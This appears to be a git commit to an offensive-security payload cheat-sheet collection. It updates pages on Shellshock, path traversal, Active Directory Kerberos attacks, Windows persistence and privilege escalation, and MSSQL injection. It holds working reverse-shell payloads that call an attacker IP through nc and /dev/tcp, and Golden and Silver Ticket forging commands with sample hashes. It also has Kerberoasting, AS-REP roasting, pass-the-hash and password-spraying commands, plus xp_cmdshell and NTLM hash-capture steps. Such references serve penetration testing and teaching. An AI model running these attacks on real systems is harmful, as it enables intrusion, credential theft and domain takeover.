Pspy + Silver Ticket + MSSQL connect

This commit is contained in:
Swissky 2019-08-18 22:24:48 +02:00
parent 4a176615fe
commit 8dffb59ac5
9 changed files with 141 additions and 44 deletions

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@ -10,8 +10,9 @@ The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptograph
Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.0.XX 4444 -e /bin/sh\r\n
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 4444 -e /bin/sh\r\n"
curl --silent -k -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/ 0>&1" ""
## CVE-2017-5638 - Apache Struts 2

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@ -9,11 +9,13 @@
* [16 bits Unicode encoding](#)
* [UTF-8 Unicode encoding](#)
* [Bypass "../" replaced by ""](#)
* [Bypass "../" with ";"](#)
* [Double URL encoding](#)
* [UNC Bypass](#unc-bypass)
* [Path Traversal](#path-traversal)
* [Interesting Linux files](#)
* [Interesting Windows files](#)
* [References](#references)
## Tools
@ -62,6 +64,13 @@ Sometimes you encounter a WAF which remove the "../" characters from the strings
### Bypass "../" with ";"
### Double URL encoding

View File

@ -46,7 +46,7 @@
### Null byte
:warning: In versions of PHP below 5.3 we can terminate with null byte.
:warning: In versions of PHP below 5.3.4 we can terminate with null byte.

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@ -9,8 +9,8 @@
* [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol)
* [Dumping AD Domain Credentials](#dumping-ad-domain-credentials-systemrootntdsntdsdit)
* [Password in AD User comment](#password-in-ad-user-comment)
* [Golden Tickets](#passtheticket-golden-tickets)
* [Silver Tickets](#passtheticket-silver-tickets)
* [Pass-the-Ticket Golden Tickets](#passtheticket-golden-tickets)
* [Pass-the-Ticket Silver Tickets](#passtheticket-silver-tickets)
* [Kerberoast](#kerberoast)
* [KRB_AS_REP roasting](#krb_as_rep-roasting)
* [Pass-the-Hash](#pass-the-hash)
@ -393,31 +393,33 @@ or dump the Active Directory and `grep` the content.
ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd -o ~/Documents/AD_DUMP/
### PassTheTicket Golden Tickets
### Pass-the-Ticket Golden Tickets
Forging a TGT require the krbtgt key
Forging a TGT require the krbtgt NTLM hash
Mimikatz version
> The way to forge a Golden Ticket is very similar to the Silver Ticket one. The main differences are that, in this case, no service SPN must be specified to, and the krbtgt ntlm hash must be used.
#### Using Mimikatz
Get info - Mimikatz
# Get info - Mimikatz
lsadump::dcsync /user:krbtgt
lsadump::lsa /inject /name:krbtgt
Forge a Golden ticket - Mimikatz
# Forge a Golden ticket - Mimikatz
kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt
Meterpreter version
#### Using Meterpreter
Get info - Meterpreter(kiwi)
# Get info - Meterpreter(kiwi)
dcsync_ntlm krbtgt
dcsync krbtgt
Forge a Golden ticket - Meterpreter
# Forge a Golden ticket - Meterpreter
load kiwi
golden_ticket_create -d <domainname> -k <nthashof krbtgt> -s <SID without le RID> -u <user_for_the_ticket> -t <location_to_store_tck>
golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck
@ -426,40 +428,51 @@ kerberos_ticket_use /root/Downloads/pentestlabuser.tck
Using a ticket on Linux
#### Using a ticket on Linux
Convert the ticket kirbi to ccache with kekeo
# Convert the ticket kirbi to ccache with kekeo
misc::convert ccache ticket.kirbi
Alternatively you can use ticketer from Impacket
# Alternatively you can use ticketer from Impacket
./ -nthash a577fcf16cfef780a2ceb343ec39a0d9 -domain-sid S-1-5-21-2972629792-1506071460-1188933728 -domain amity.local mbrody-da -nthash HASHKRBTGT -domain-sid SID_DOMAIN_A -domain DEV Administrator -extra-sid SID_DOMAIN_B_ENTERPRISE_519
./ -nthash e65b41757ea496c2c60e82c05ba8b373 -domain-sid S-1-5-21-354401377-2576014548-1758765946 -domain DEV Administrator -extra-sid S-1-5-21-2992845451-2057077057-2526624608-519
export KRB5CCNAME=/home/user/ticket.ccache
NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file
# NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file
./ -k -no-pass -dc-ip AD/administrator@
### PassTheTicket Silver Tickets
If you need to swap ticket between Windows and Linux, you need to convert them with `ticket_converter` or `kekeo`.
root@kali:ticket_converter$ python velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi
root@kali:ticket_converter$ python velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache
### Pass-the-Ticket Silver Tickets
Forging a TGS require machine accound password (key) from the KDC
Create a ticket for the service
/kerberos::golden /domain:adsec.local /user:ANY /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:ceaxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /target:DESKTOP-01.adsec.local /service:cifs /ptt
# Create a ticket for the service
mimikatz $ kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE
Then use the same steps as a Golden ticket
misc::convert ccache ticket.kirbi
export KRB5CCNAME=/home/user/ticket.ccache
./ -k -no-pass -dc-ip AD/administrator@
# Examples
mimikatz $ /kerberos::golden /domain:adsec.local /user:ANY /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:ceaxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /target:DESKTOP-01.adsec.local /service:cifs /ptt
mimikatz $ kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:b18b4b218eccad1c223306ea1916885f /user:stegosaurus /service:cifs /target:labwws02.jurassic.park
# Then use the same steps as a Golden ticket
mimikatz $ misc::convert ccache ticket.kirbi
root@kali:/tmp$ export KRB5CCNAME=/home/user/ticket.ccache
root@kali:/tmp$ ./ -k -no-pass -dc-ip AD/administrator@
### Kerberoast
@ -483,7 +496,7 @@ $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43c360c29c1
Alternatively with [Rubeus](
.\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD
.\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD /outfile:hash.txt
Then crack the ticket with hashcat or john
@ -499,7 +512,7 @@ If a domain user does not have Kerberos preauthentication enabled, an AS-REP can
C:\>git clone
C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user
C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user /format:hashcat /outfile:hashes.asreproast
______ _
(_____ \ | |
@ -527,6 +540,19 @@ v1.3.4
[*] AS-REP hash:
C:\Rubeus> john --wordlist=passwords_kerb.txt hashes.asreproast
Using `impacket` to get the hash and `hashcat` to crack it.
# extract hashes
root@kali:impacket-examples$ python jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
root@kali:impacket-examples$ python jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
# crack AS_REP messages
root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
### Pass-the-Hash
@ -565,22 +591,30 @@ sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm has
### OverPass-the-Hash (pass the key)
Request a TGT with only the NT hash
Request a TGT with only the NT hash then you can connect to the machine using the TGT.
#### Using impacket
Using impacket
./ -hashes :1a59bd44fe5bec39c44c8cd3524dee
chmod 600 tgwynn.ccache
root@kali:impacket-examples$ python ./ -hashes :1a59bd44fe5bec39c44c8cd3524dee
root@kali:impacket-examples$ export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
root@kali:impacket-examples$ python jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass
also with the AES Key if you have it
./ -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx
root@kali:impacket-examples$ ./ -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx
ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5
kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM
#### Using Rubeus
C:\Users\triceratops>.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
C:\Users\triceratops>.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd
### Capturing and cracking NTLMv2 hashes
If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network.
@ -817,26 +851,29 @@ Password spraying refers to the attack method that takes a large number of usern
> The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates.
Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
#### Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
> Kerberos pre-authentication errors are not logged in Active Directory with a normal Logon failure event (4625), but rather with specific logs to Kerberos pre-authentication failure (4771).
root@kali:~$ ./kerbrute_linux_amd64 userenum -d usernames.txt
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain_users.txt Password123
root@kali:~$ python -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.
#### Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.
crackmapexec smb -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
Using [RDPassSpray]( to target RDP services.
#### Using [RDPassSpray]( to target RDP services.
python3 -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]
Using [hydra]() and [ncrack]() to target RDP services.
#### Using [hydra]() and [ncrack]() to target RDP services.
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://
@ -950,4 +987,5 @@ PXE allows a workstation to boot from the network by retrieving an operating sys
* [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - 28 January 2019 - Elad Shami](
* [[PrivExchange] From user to domain admin in less than 60sec ! - davy](
* [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](
* [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](
* [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](

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@ -213,6 +213,14 @@ cat /etc/cron.allow
cat /etc/cron.deny*
You can use [pspy]( to detect a CRON job.
# print both commands and file system events and scan procfs every 1000 ms (=1sec)
./pspy64 -pf -i 1000
## Systemd timers

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@ -1,5 +1,18 @@
# Windows - Persistence
## Summary
* [Userland](#userland)
* [Registry](#registry)
* [Startup](#startup)
* [Scheduled Task](#scheduled-task)
* [Elevated](#elevated)
* [HKLM](#hklm)
* [Services](#services)
* [Scheduled Task](#scheduled-task)
* [References](#references)
## Userland
### Registry

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@ -424,6 +424,7 @@ Scheduled tasks
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
@ -698,6 +699,7 @@ Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -n
### Juicy Potato (abusing the golden privileges)
Binary available at :
:warning: Juicy Potato doesn't work in Windows Server 2019.
1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication)

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@ -1,5 +1,23 @@
# MSSQL Injection
## Summary
* [MSSQL comments](#mssql-comments)
* [MSSQL version](#mssql-version)
* [MSSQL database name](#mssql-database-name)
* [MSSQL List databases](#mssql-list-database)
* [MSSQL List columns](#mssql-list-columns)
* [MSSQL List tables](#mssql-list-tables)
* [MSSQL Extract user/password](#mssql-extract-user-password)
* [MSSQL Union Based](#mssql-union-based)
* [MSSQL Error Based](#mssql-error-based)
* [MSSQL Blind Based](#mssql-blind-based)
* [MSSQL Time Based](#mssql-time-based)
* [MSSQL Stacked query](#mssql-stack-query)
* [MSSQL Command execution](#mssql-command-execution)
* [MSSQL UNC path](#mssql-unc-path)
* [MSSQL Make user DBA](#mssql-make-user-dba)
## MSSQL comments
@ -19,14 +37,14 @@ SELECT @@version
## MSSQL List Databases
## MSSQL List databases
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); — for N = 0, 1, 2, …
## MSSQL List Column
## MSSQL List columns
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = mytable); — for the current DB only
@ -35,7 +53,7 @@ SELECT, TYPE_NAME(master..syscolumns.xtype) FROM master.
SELECT table_catalog, column_name FROM information_schema.columns
## MSSQL List Tables
## MSSQL List tables
SELECT name FROM master..sysobjects WHERE xtype = U; — use xtype = V for views
@ -45,7 +63,7 @@ SELECT, TYPE_NAME(master..syscolumns.xtype) FROM master.
SELECT table_catalog, table_name FROM information_schema.columns
## MSSQL User Password
## MSSQL Extract user/password
MSSQL 2000:
@ -137,6 +155,13 @@ EXEC sp_configure 'xp_cmdshell',1;
To interact with the MSSQL instance.
sqsh -S 192.168.1.X -U sa -P superPassword
python WORKGROUP/Administrator:password@192.168.1X -port 46758
MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.

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@ -52,6 +52,7 @@ Simple characters
Wildcard (*)
&apos; # required for XML content
Multiple encoding